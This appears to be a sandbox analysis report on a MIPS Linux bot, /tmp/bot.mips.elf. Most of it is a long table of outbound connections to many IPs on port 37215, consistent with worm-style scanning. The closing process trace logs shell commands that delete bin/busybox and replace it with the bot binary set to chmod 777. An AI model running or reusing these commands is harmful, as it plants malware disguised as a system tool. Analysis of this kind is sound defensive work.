                                                  19826192.168.2.1345578184.78.43.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19827192.168.2.1356758197.101.13.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19828192.168.2.133313099.206.2.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19829192.168.2.134787441.206.57.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19830192.168.2.1338160197.145.78.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19831192.168.2.1339766197.137.157.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19832192.168.2.1352778197.209.91.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19833192.168.2.1343794157.85.235.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19834192.168.2.1349054197.47.187.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19835192.168.2.134609241.7.19.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19836192.168.2.1352308197.179.169.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19837192.168.2.134529874.104.3.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19838192.168.2.1360496197.61.237.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19839192.168.2.133918841.200.241.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19840192.168.2.1343090157.164.169.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19841192.168.2.135718041.43.202.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19842192.168.2.1355694197.26.44.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19843192.168.2.1360758157.29.38.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19844192.168.2.133654818.125.81.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19845192.168.2.1359632197.234.104.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19846192.168.2.1355698197.118.59.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19847192.168.2.135307041.70.11.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19848192.168.2.135532841.155.99.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19849192.168.2.1352120197.24.65.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19850192.168.2.133926241.172.60.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19851192.168.2.135999641.73.116.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19852192.168.2.1356652157.197.217.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19853192.168.2.1349122197.245.51.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19854192.168.2.133871041.127.17.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19855192.168.2.1346456157.94.51.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19856192.168.2.13501765.30.161.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19857192.168.2.136032677.6.211.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19858192.168.2.1349108157.236.49.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19859192.168.2.133764641.99.81.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19860192.168.2.1359614197.45.209.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19861192.168.2.1352424157.62.122.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19862192.168.2.1353510164.144.128.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19863192.168.2.1335210157.86.107.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19864192.168.2.1336166157.189.121.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19865192.168.2.1350572197.191.70.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19866192.168.2.1353314157.111.247.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19867192.168.2.1341266222.144.95.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19868192.168.2.1333708201.245.6.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19869192.168.2.1345992135.223.103.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19870192.168.2.1336408148.180.91.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19871192.168.2.1344876197.78.2.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19872192.168.2.134527641.230.125.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19873192.168.2.1342520197.30.212.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19874192.168.2.1352184197.31.227.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19875192.168.2.1355266197.173.78.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19876192.168.2.1337118177.97.170.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19877192.168.2.1355334197.127.240.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19878192.168.2.135522092.108.150.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19879192.168.2.135652470.6.113.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19880192.168.2.133463641.21.120.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19881192.168.2.1335856205.128.183.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19882192.168.2.1342628197.43.94.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19883192.168.2.1349528219.137.226.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19884192.168.2.133845034.250.58.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19885192.168.2.1348978182.97.124.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19886192.168.2.1332908157.103.242.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19887192.168.2.1333378197.75.3.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19888192.168.2.133401867.111.4.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19889192.168.2.1349310157.50.72.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19890192.168.2.135721841.155.33.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19891192.168.2.1343304197.61.196.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19892192.168.2.135106441.208.204.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19893192.168.2.1348340157.67.235.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19894192.168.2.1343586148.43.245.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19895192.168.2.1350510197.108.95.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19896192.168.2.1338434129.118.31.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19897192.168.2.1344238197.232.27.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19898192.168.2.1354478197.219.77.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19899192.168.2.1354506197.169.14.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19900192.168.2.134398082.2.139.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19901192.168.2.133644641.14.148.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19902192.168.2.135305020.190.170.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19903192.168.2.135937641.137.243.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19904192.168.2.1345392135.88.202.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19905192.168.2.134414041.153.118.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19906192.168.2.134307441.208.72.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19907192.168.2.1339886123.161.1.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19908192.168.2.135313051.15.202.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19909192.168.2.1358826197.62.153.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19910192.168.2.1352598197.208.221.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19911192.168.2.1351824157.169.92.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19912192.168.2.1335916192.110.23.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19913192.168.2.134434241.182.229.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19914192.168.2.135331279.247.6.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19915192.168.2.1356970157.82.0.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19916192.168.2.134765873.233.30.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19917192.168.2.133783046.179.161.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19918192.168.2.135958041.22.220.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19919192.168.2.1341356197.80.143.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19920192.168.2.1333520148.255.119.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19921192.168.2.1353858197.251.50.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19922192.168.2.1340348197.93.176.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19923192.168.2.135774641.151.187.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19924192.168.2.1345904101.5.174.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19925192.168.2.1357084197.254.191.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19926192.168.2.1349238197.172.238.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19927192.168.2.1359214188.99.51.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19928192.168.2.1347878193.208.21.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19929192.168.2.1344620157.130.135.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19930192.168.2.134040041.222.197.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19931192.168.2.1341046157.1.227.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19932192.168.2.134764841.66.34.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19933192.168.2.1349680197.169.114.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19934192.168.2.133540441.137.212.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19935192.168.2.133789453.103.156.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19936192.168.2.134894843.190.99.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19937192.168.2.1350002197.128.253.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19938192.168.2.1355558209.239.249.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19939192.168.2.133473241.201.200.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19940192.168.2.134786814.115.15.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19941192.168.2.1353492157.168.217.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19942192.168.2.1358036197.12.150.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19943192.168.2.1339778197.93.202.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19944192.168.2.1360704197.162.132.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19945192.168.2.135420241.25.172.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19946192.168.2.134303041.99.223.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19947192.168.2.1333322157.198.84.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19948192.168.2.1334110197.0.158.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19949192.168.2.1338446200.136.233.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19950192.168.2.1352464197.218.255.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19951192.168.2.1337666197.206.52.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19952192.168.2.1358182197.133.65.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19953192.168.2.1347296157.158.152.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19954192.168.2.1360344197.115.181.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19955192.168.2.1337632131.207.35.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19956192.168.2.1352892157.223.173.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19957192.168.2.1339468157.97.215.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19958192.168.2.1333370102.33.179.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19959192.168.2.135865641.221.232.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19960192.168.2.1358266120.173.106.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19961192.168.2.136024041.27.16.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19962192.168.2.1348472157.125.100.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19963192.168.2.13577308.112.117.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19964192.168.2.134537273.208.161.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19965192.168.2.1350862197.33.188.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19966192.168.2.135785441.114.163.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19967192.168.2.1356604180.72.45.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19968192.168.2.134132841.145.98.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19969192.168.2.1343798197.138.95.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19970192.168.2.1345528197.28.57.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19971192.168.2.135699859.155.74.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19972192.168.2.1344354146.252.14.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19973192.168.2.1346592197.242.12.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19974192.168.2.1341190197.249.48.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19975192.168.2.1359102135.115.58.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19976192.168.2.1341178179.49.0.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19977192.168.2.135840441.65.85.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19978192.168.2.1345732197.99.203.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19979192.168.2.1339572157.109.242.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19980192.168.2.1349476183.189.88.6937215
                                                  TimestampBytes transferredDirectionData


                                                  System Behavior

                                                  Start time (UTC):13:15:09
                                                  Start date (UTC):29/05/2024
                                                  Path:/tmp/bot.mips.elf
                                                  Arguments:/tmp/bot.mips.elf
                                                  File size:5777432 bytes
                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                  Start time (UTC):13:15:09
                                                  Start date (UTC):29/05/2024
                                                  Path:/tmp/bot.mips.elf
                                                  Arguments:-
                                                  File size:5777432 bytes
                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                  Start time (UTC):13:15:09
                                                  Start date (UTC):29/05/2024
                                                  Path:/bin/sh
                                                  Arguments:sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/bot.mips.elf bin/busybox; chmod 777 bin/busybox"
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):13:15:09
                                                  Start date (UTC):29/05/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):13:15:09
                                                  Start date (UTC):29/05/2024
                                                  Path:/usr/bin/rm
                                                  Arguments:rm -rf bin/busybox
                                                  File size:72056 bytes
                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                  Start time (UTC):13:15:09
                                                  Start date (UTC):29/05/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):13:15:09
                                                  Start date (UTC):29/05/2024
                                                  Path:/usr/bin/mkdir
                                                  Arguments:mkdir bin
                                                  File size:88408 bytes
                                                  MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                                  Start time (UTC):13:15:09
                                                  Start date (UTC):29/05/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):13:15:09
                                                  Start date (UTC):29/05/2024
                                                  Path:/usr/bin/mv
                                                  Arguments:mv /tmp/bot.mips.elf bin/busybox
                                                  File size:149888 bytes
                                                  MD5 hash:504f0590fa482d4da070a702260e3716

                                                  Start time (UTC):13:15:09
                                                  Start date (UTC):29/05/2024
                                                  Path:/bin/sh
                                                  Arguments:-
                                                  File size:129816 bytes
                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                  Start time (UTC):13:15:09
                                                  Start date (UTC):29/05/2024
                                                  Path:/usr/bin/chmod
                                                  Arguments:chmod 777 bin/busybox
                                                  File size:63864 bytes
                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                  Start time (UTC):13:15:09
                                                  Start date (UTC):29/05/2024
                                                  Path:/tmp/bot.mips.elf
                                                  Arguments:-
                                                  File size:5777432 bytes
                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                  Start time (UTC):13:15:09
                                                  Start date (UTC):29/05/2024
                                                  Path:/tmp/bot.mips.elf
                                                  Arguments:-
                                                  File size:5777432 bytes
                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                  Start time (UTC):13:15:09
                                                  Start date (UTC):29/05/2024
                                                  Path:/tmp/bot.mips.elf
                                                  Arguments:-
                                                  File size:5777432 bytes
                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c